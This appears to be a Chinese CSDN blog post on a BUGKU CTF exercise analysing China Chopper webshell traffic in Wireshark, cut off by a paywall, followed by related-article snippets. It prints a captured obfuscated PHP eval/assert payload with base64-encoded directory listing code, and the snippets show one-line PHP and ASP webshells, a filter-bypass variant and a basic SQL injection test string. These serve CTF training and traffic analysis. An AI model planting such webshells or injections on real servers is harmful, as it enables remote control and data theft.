【BUGKU】CTF >>分析---中国菜刀

最新推荐文章于 2025-03-24 11:06:00 发布
最新推荐文章于 2025-03-24 11:06:00 发布
阅读量2.3k 收藏 5
点赞数
文章标签: php wireshark 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Chenamao/article/details/107900594
版权
这篇博客详细介绍了如何分析一个名为中国菜刀的CTF挑战,通过Wireshark抓取并解析网络数据包。博主关注了POST请求,特别是通过Base64编码的数据,并揭示了这些数据包中隐藏的目录信息。最终,博主成功解码数据,找到了关键的钥匙,验证后获得成功。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

【BUGKU】CTF >>分析---中国菜刀

【BUGKU】CTF >>分析---中国菜刀

解压完成后发现为pcapng文件格式

利用wireshark (我们的小鲨鱼)打开文件。

 

第一个数据包:

可以看出客户端用POST方式访问服务器的3.PHP文件

 

POST请求

123=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9J0M6XFx3d3dyb290XFwnOyRGPUBvcGVuZGlyKCREKTtpZigkRj09TlVMTCl7ZWNobygiRVJST1I6Ly8gUGF0aCBOb3QgRm91bmQgT3IgTm8gUGVybWlzc2lvbiEiKTt9ZWxzZXskTT1OVUxMOyRMPU5VTEw7d2hpbGUoJE49QHJlYWRkaXIoJEYpKXskUD0kRC4nLycuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSJcdCIuJFQuIlx0Ii5AZmlsZXNpemUoJFApLiJcdCIuJEUuIlxuIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTtlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");"));

 

 

注:这是经过base64进行编码过的数据

base64解码:

@ini_set("display_errors","0");

@set_time_limit(0);

if(PHP_VERSION<'5.3.0'){

@set_magic_quotes_runtime(0);
最低0.47元/天 解锁文章
Chenamao
关注
【愚公系列】2023年06月 网络安全(交通银行杯)-中国菜
时光隧道
04-15 8385
Wireshark(前称Ethereal)是一个网络数据包分析软件。网络数据包分析软件的功能是截取网络数据包,并尽可能显示出最为详细的网络数据包数据。在过去,网络数据包分析软件是非常昂贵,或是专门属于营利用的软件,Wireshark的出现改变了这一切。在GNU通用公共许可证的保障范围底下,用户可以以免费的代价获取软件与其代码,并拥有针对其源代码修改及定制化的权利。Wireshark是目前全世界最广泛的网络数据包分析软件之一。
bugkuctf-分析-菜刀
wuerror的博客
02-01 1253
1.打开下载的压缩包,里面是个pcapng文件。用wireshark打开。 先看看http 包比较少而且info里也没什么特别的信息,每个点开看看 在第四个包里发现了一句话,重点来了! 看下一个包,他做了什么。选中第五个包,右键选择追踪HTTP流 base64解码$xx(' ')引号内的内容 发现他尝试读取flag.tar.gz文件,且在头尾输出了X@Y.接着看第六个H...
BugkuCTF分析题之中国菜
A_dmin的博客
12-16 4977
BugkuCTF分析题之中国菜 进入点击下载zip文件,解压用wireshark打开。 搜索HTTP. 点击第一个http包,选择复制纯文本。 去掉头尾,在尾部加上==,用BASE64解码 逐个分析。 看着$D应该是显示文件啥的!! 继续走! 第二个是个显示的文本,好像没啥,继续! 第三个: 同第一个解码: 好像是显示3.php里的内容的。继续走!! 分析第4个http包: ...
BUUCTF-MISC-菜刀666
最新发布
m0_59028058的博客
03-24 320
通过分析可以发现,z1的参数进行base64解码得到的是一个图片文件路径,z2的参数是一串十六进制编码,从FF D8 FF 可以看出这是 jpg 文件的文件头。5、在该数据包中发现,wireshark 截取的流量中,会截取文件传输对应的流量,也就是说,这个pcapng文件将包括了这个 zip 压缩包。7、解压时发现该被加密了,需要一个密码,想起来之前拿到的一个密码,使用改密码进行解压缩最终得到flag.txt。3、将z2的参数提取出来,放入二进制编辑器中,并新建保存成 .jpg 文件。
CTFBugku分析中国菜
LainWith的博客
08-07 1215
首先需要注册一个账号才能做题,进入之后全局网页搜索“菜刀”即可找到题目。地址 由于题目是菜刀,所以流量一定是HTTP协议类型,先来过滤一下数据包 追踪TCP流,发现目标 得嘞,就从200OK的包里面分析 先从第一个开始 看到了目标 由于目标是个压缩包,所以选择解码为“压缩” 然后无论怎么改变“开始”也看不到任何信息 搞下一个包 同上,第二个更改解码为“压缩”无果 再搞最后一个包 当开始位置调到3时,又结果了 答案:key{8769fe393f2b998fa6a11afe2bfcd65e}
中国菜使用教程--ctf 文件上传
weixin_40729735的博客
11-07 5903
首先把包含一句话的文件上传,php内容文件如下: <?php eval($_POST['a']); ?> 如果会过滤 <? 和 php 关键字,可以使用长标签 <script language="pHp">@eval($_POST['sb'])</script> 打开中国菜主页面,右键点击添加,配置如下(密码即上面的sb) 点击...
CTF竞赛实战 中国菜与一句话木马
热门推荐
keep coding
05-05 7万+
中国菜下载地址: http://pan.baidu.com/share/link?shareid=871753024&amp;uk=388464620一.基本操作:往目标网站中加入一句话木马,然后你就可以在本地通过中国菜chopper.exe即可获取和控制整个网站目录二.实战asp的一句话是:&lt;%eval request ("pass")%&gt;aspx的一句话是:&lt;%@ P...
BugkuCTF(old)----流量分析题目Writeup
Au
09-26 1977
flag被盗 文件不是很大,粗略看了一下,发现了shell.php字段 筛选为http流量,追踪TCP查看 直接得到flagflag{This_is_a_f10g} 中国菜 下载解压得到数据包,比较小只有7kb 只有TCP和HTTP协议流量,追踪TCP流查看,发现flag.tar.gz压缩包 使用kali集成的 binwa...
bugku ctf 分析 中国菜 (国产神器)
qq_42777804的博客
05-27 1934
下载后解压后打开 我做的方法直接 改后缀名为 .zip 再次解压 打开后 用记事本打开 得到 flag 另一种放到 Linux中 使用binwalk -e binwalk -e 文件路径 ”,得到分离后的文件 我把它拿出来 (因为在 Linux中我不会使用解压命令哈哈哈) 改为 .zip 解压后 打开 ...
Bugkuctf ——流量分析 write up(持续更新中)
welcome.php
01-07 2338
流量包分析 CTF 比赛中, 流量包的取证分析是另一项重要的考察方向,有时候电子取证也会涉及到这方面的知识。 通常比赛中会提供一个包含流量数据的 PCAP 文件,有时候也会需要选手们先进行修复或重构传输文件后,再进行分析。 PCAP 这一块作为重点考察方向,复杂的地方在于数据包里充满着大量无关的流量信息,因此如何分类和过滤数据是参赛者需要完成的工作。 铁人三项的话是查找ip 服务器 还原入侵过...
Bugku分析 中国菜
qq_26961571的博客
11-16 229
​这道题难道和中国菜有关??? 下载文件之后果然是一个分析包的题目, 筛选HTTP协议,在最后一个的时候发现有一堆乱码。 右键选择显示分组字节 在这里下面可以选择解码为什么格式,一般有base64,rot13之类的,很方便。但是这次居然是用到了压缩,点击压缩之后一片空白,但是点击开始往上加数字,突然就有了文本。 flag就在里面了,这个压缩的意思是压缩包吧,上传了一个压缩包,这里用字节流可以直接看到压缩包里的内容。 key{8769fe393f2b9...
CTFBugkuCTF - 分析 - 中国菜
干铮的博客
08-08 744
下载caidao.zip 解压文件用wireshark分析 查看HTTP状态码,200OK这个包,看出有一个txt文件在里面。 之后用kali里的工具binwalk将文件拆分出来 binwalk -e caidao.pcapng
BugkuCTF | 中国菜
weixin_47982238的博客
10-06 388
菜刀这一类型的题真的逃避了好久了,幸好有我的好儿子会督促我,终于成功了一道题!!!!! 谨以此博客纪念我的第一道菜刀,和我那勤勤恳恳的好大儿!!!!
bugku——分析(流量分析)题解
小锤队长的博客
10-19 4682
目录 1,flag被盗 2,中国菜 3,这么多数据包 4,手机热点 5,抓到一只苍蝇 6,日志审计 7,weblogic 8,信息提取(超详细) 9,特殊后门 1,flag被盗 ctrl + f 打开搜索框,搜flag ,找到 93 个数据包里有 flag.txt字样, 右键,追踪 TCP数据流,在其中看到了 flag: flag{This_is_a_f10g}...
记录CTF misc之菜刀流量分析
黑面狐
01-22 1万+
一、前言 昨天参加了一场CTF比赛,做了一道菜刀流量分析的题目,因为之前流量分析这块不是很熟悉,加上实战CTF也比较少走了不少弯路。 二、流量分析 菜刀是常见的连接webshell的工具,连接webshell会有明显的GET或POST请求。所以我们只需要找数据包的HTTP请求就行了。 找到第一个HTTP请求,选择追踪HTTP流,进行分析 我们看到webshell就是/upload
“百度杯”CTF比赛 九月场Upload 之菜刀的使用
qq_42764906的博客
05-17 830
最近越学习 越感觉自己菜 然而 这并不是重点 然而 我有一颗上进的心 哈哈哈 敲黑板 划重点了 我们把没用的地方删掉 直接进入菜刀方法解决这道题 题干不是白给的 上传一句话木马 <?php eval($_POST['a']); ?> 发现 过滤掉<? 于是想办法绕过 在网上找到一个一句话,修改后如下 <script language="pHp">@eval($_...
buuctf 杂项 菜刀666
always_green的博客
11-01 713
一些简单题,直接找会话比较长的然后ctrl+f 找flag就秒了,这边每个会话都很长,需要慢慢找,这题要结合菜刀的特征+杂项内容zip和jpg文件头)去分析。010editor文本区域最后也提示我们需要密码,继续查看pcap文件,注意这里只查看标识为本地的包,双击数据包,然后点击数据流,我们只读数据量,因为它可读。下载下来是个PCap流量包,这里可以选择wireshark,我平时喜欢用科来,这是我hw期间遇到的一款流量分析软件,国产的对国人比较友好🤦‍。伪加密,我使用了ZipCenOp,失败。
CTF-数据分析(三)
→_→
08-02 2752
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 5.数据包分析- DNS (来源:网络) 1.关卡描述 2.解题步骤 2.1 点击题目查看描述并下载附件 2.2 解压文件并打开文件、 2.3 短暂跟踪DNS查询,有数据包可疑的 636d467563323170.192.168.191.129地址 ...
文件上传&中国菜 —— 【WUST-CTF2020】CV Maker
Ve99tr’s Blog
03-30 1865
图片马文件上传以及使用中国菜连接服务器
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取数据库中的某个表的内容。 2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们需要判断注入类型。可以通过在输入框中输入一些测试语句(如' or 1=1--)来判断是否存在注入漏洞。如果页面返回正常,那么很可能存在注入漏洞。 4. 获取数据库信息:一旦确认存在注入漏洞,我们可以通过构造合适的SQL语句来获取数据库信息。可以使用UNION SELECT语句来获取表的列数和列名,然后使用SELECT语句获取表的内容。 5. 构造SQL语句:根据题目要求,我们需要获取某个表的内容。可以使用如下语句来获取表的内容: SELECT column_name FROM information_schema.columns WHERE table_name='表名'; SELECT * FROM 表名; 6. 获取结果:根据构造的SQL语句,将其作为输入发送给服务器,获取返回的结果。根据返回的结果,我们可以得到表的列数、列名和表的内容。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值